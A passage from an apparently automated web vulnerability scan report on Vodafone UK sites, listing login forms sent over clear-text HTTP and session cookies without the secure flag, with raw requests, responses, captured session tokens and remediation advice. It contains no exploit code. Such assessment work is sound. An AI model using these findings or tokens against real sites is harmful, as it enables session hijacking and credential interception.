Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

2.1. http://forum.vodafone.co.uk/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:04 GMT
Server: Apache
Set-Cookie: LiSESSIONID=BA63D58ED24E274B721ECAC91D049352; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 185384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<div id="custom_quicklinks">

<form enctype="multipart/form-data" class="lia-form lia-form-horizontal UserLoginForm lia-component-users-widget-login-form" action="/t5/components/componentdisplaycontributionpage.userloginform.form.form.form" method="post" id="form_133b7fc49fb" name="form_133b7fc49fb"><div class="t-invisible">
...[SNIP]...
<div class="lia-form-input-wrapper">

           <input class="lia-form-password-input lia-form-type-text" maxlength="20" value="" id="password_133b7fc49fb" name="password" type="password"></input>
...[SNIP]...

2.2. http://forum.vodafone.co.uk/t5/Apple/bd-p/72 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Apple/bd-p/72

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field:

password

Request

GET /t5/Apple/bd-p/72 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:04 GMT
Server: Apache
Set-Cookie: LiSESSIONID=5CA88AB70CDD9338DBD4A0F0D77DDAA5; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 245278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<div id="custom_quicklinks">

<form enctype="multipart/form-data" class="lia-form lia-form-horizontal UserLoginForm lia-component-users-widget-login-form" action="/t5/components/componentdisplaycontributionpage.userloginform.form.form.form" method="post" id="form_133b7fc4ac7" name="form_133b7fc4ac7"><div class="t-invisible">
...[SNIP]...
<div class="lia-form-input-wrapper">

           <input class="lia-form-password-input lia-form-type-text" maxlength="20" value="" id="password_133b7fc4ac7" name="password" type="password"></input>
...[SNIP]...

2.3. http://forum.vodafone.co.uk/t5/BlackBerry/bd-p/50 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/BlackBerry/bd-p/50

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field:

password

Request

GET /t5/BlackBerry/bd-p/50 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:04 GMT
Server: Apache
Set-Cookie: LiSESSIONID=DDA7C5319DBBA671343F4E812A820817; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 237088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<div id="custom_quicklinks">

<form enctype="multipart/form-data" class="lia-form lia-form-horizontal UserLoginForm lia-component-users-widget-login-form" action="/t5/components/componentdisplaycontributionpage.userloginform.form.form.form" method="post" id="form_133b7fc4be7" name="form_133b7fc4be7"><div class="t-invisible">
...[SNIP]...
<div class="lia-form-input-wrapper">

           <input class="lia-form-password-input lia-form-type-text" maxlength="20" value="" id="password_133b7fc4be7" name="password" type="password"></input>
...[SNIP]...

2.4. http://forum.vodafone.co.uk/t5/HTC/bd-p/htc previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/HTC/bd-p/htc

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field:

password

Request

GET /t5/HTC/bd-p/htc HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:05 GMT
Server: Apache
Set-Cookie: LiSESSIONID=25111786C93DB77FDC00C21F47D19B2C; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 239727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<div id="custom_quicklinks">

<form enctype="multipart/form-data" class="lia-form lia-form-horizontal UserLoginForm lia-component-users-widget-login-form" action="/t5/components/componentdisplaycontributionpage.userloginform.form.form.form" method="post" id="form_133b7fc4cd4" name="form_133b7fc4cd4"><div class="t-invisible">
...[SNIP]...
<div class="lia-form-input-wrapper">

           <input class="lia-form-password-input lia-form-type-text" maxlength="20" value="" id="password_133b7fc4cd4" name="password" type="password"></input>
...[SNIP]...

2.5. http://forum.vodafone.co.uk/t5/Vodafone-Sure-Signal/bd-p/70 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Vodafone-Sure-Signal/bd-p/70

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field:

password

Request

GET /t5/Vodafone-Sure-Signal/bd-p/70 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:05 GMT
Server: Apache
Set-Cookie: LiSESSIONID=7A95ADABF20C27FB3E4FAE7435D6141F; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 251092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<div id="custom_quicklinks">

<form enctype="multipart/form-data" class="lia-form lia-form-horizontal UserLoginForm lia-component-users-widget-login-form" action="/t5/components/componentdisplaycontributionpage.userloginform.form.form.form" method="post" id="form_133b7fc4ddb" name="form_133b7fc4ddb"><div class="t-invisible">
...[SNIP]...
<div class="lia-form-input-wrapper">

           <input class="lia-form-password-input lia-form-type-text" maxlength="20" value="" id="password_133b7fc4ddb" name="password" type="password"></input>
...[SNIP]...

3. SSL cookie without secure flag set previous next
There are 30 instances of this issue:

https://freesim.vodafone.co.uk/freesim
https://freesim.vodafone.co.uk/orders/add
https://freesim.vodafone.co.uk/packages/index
https://help.vodafone.co.uk/system/selfservice.controller
https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/reset.css
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/articleappearance.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/browseTopic.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/commonVariables.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/main.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/misclinks.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchinpututil.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/sidelinks.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/templateutils.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js
https://help.vodafone.co.uk/system/web/widget/platform/util/util.js

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

3.1. https://freesim.vodafone.co.uk/freesim previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://freesim.vodafone.co.uk
Path:	/freesim

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ci_session=a%3A0%3A%7B%7D; expires=Fri, 19-Nov-2010 05:00:17 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:17 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /freesim HTTP/1.1
Host: freesim.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&PARTITION_ID=1&CONFIGURATION=1058&SIDE_LINK_TOPIC_ID=9849&TOPIC_ID=9849&TOPIC_TYPE=0&STARTING_ID=0&TOPIC_NAME=Sony%20Ericsson&PARENT_TOPIC_ID=-1&PARENT_TOPIC_TYPE=0&SOURCE_FORM=BROWSE_TOPIC
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20s_sq%3Dvodafonegroupukprod%253D%252526pid%25253Dhel%2525253ASony%25252520Ericsson%25252520-%25252520Help%25252520-%25252520Vodafone%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Ffreesim.vodafone.co.uk%2525252Ffreesim%252526ot%25253DA%3B; ci_csrf_token=dd84c0b9cbdc9fee5188ae42ba617736; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224bbae6314fafd19c2f713147a2aac21f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321641758%3B%7D5868556a3f86da8aea60b3078a3ac3e5

Response

HTTP/1.1 302 Found
Date: Fri, 18 Nov 2011 19:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.8
Set-Cookie: ci_session=a%3A0%3A%7B%7D; expires=Fri, 19-Nov-2010 05:00:17 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:17 GMT; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: /packages/index?tracker=58f8dj&keyword=freesim
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

3.2. https://freesim.vodafone.co.uk/orders/add previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://freesim.vodafone.co.uk
Path:	/orders/add

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ci_csrf_token=914421352fdf38872d27610e72d9310e; expires=Fri, 18-Nov-2011 20:42:08 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223fd40005a122b4f5d4ab8ccc0ff9cc7e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321641728%3B%7D58e568a9ede150a6f74148acb75e1106; expires=Fri, 18-Nov-2011 19:42:08 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orders/add HTTP/1.1
Host: freesim.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.3. https://freesim.vodafone.co.uk/packages/index previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://freesim.vodafone.co.uk
Path:	/packages/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ci_csrf_token=dd84c0b9cbdc9fee5188ae42ba617736; expires=Fri, 18-Nov-2011 21:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /packages/index?tracker=58f8dj&keyword=freesim HTTP/1.1
Host: freesim.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&PARTITION_ID=1&CONFIGURATION=1058&SIDE_LINK_TOPIC_ID=9849&TOPIC_ID=9849&TOPIC_TYPE=0&STARTING_ID=0&TOPIC_NAME=Sony%20Ericsson&PARENT_TOPIC_ID=-1&PARENT_TOPIC_TYPE=0&SOURCE_FORM=BROWSE_TOPIC
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20s_sq%3Dvodafonegroupukprod%253D%252526pid%25253Dhel%2525253ASony%25252520Ericsson%25252520-%25252520Help%25252520-%25252520Vodafone%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Ffreesim.vodafone.co.uk%2525252Ffreesim%252526ot%25253DA%3B; ci_csrf_token=dd84c0b9cbdc9fee5188ae42ba617736; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 19:00:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.8
Set-Cookie: ci_csrf_token=dd84c0b9cbdc9fee5188ae42ba617736; expires=Fri, 18-Nov-2011 21:00:25 GMT; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fb668fd31f94676b4086437b84159e37%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321642817%3B%7D514e42dec77e1189eec1b7db7f3f7cb6; expires=Fri, 18-Nov-2011 20:00:25 GMT; path=/
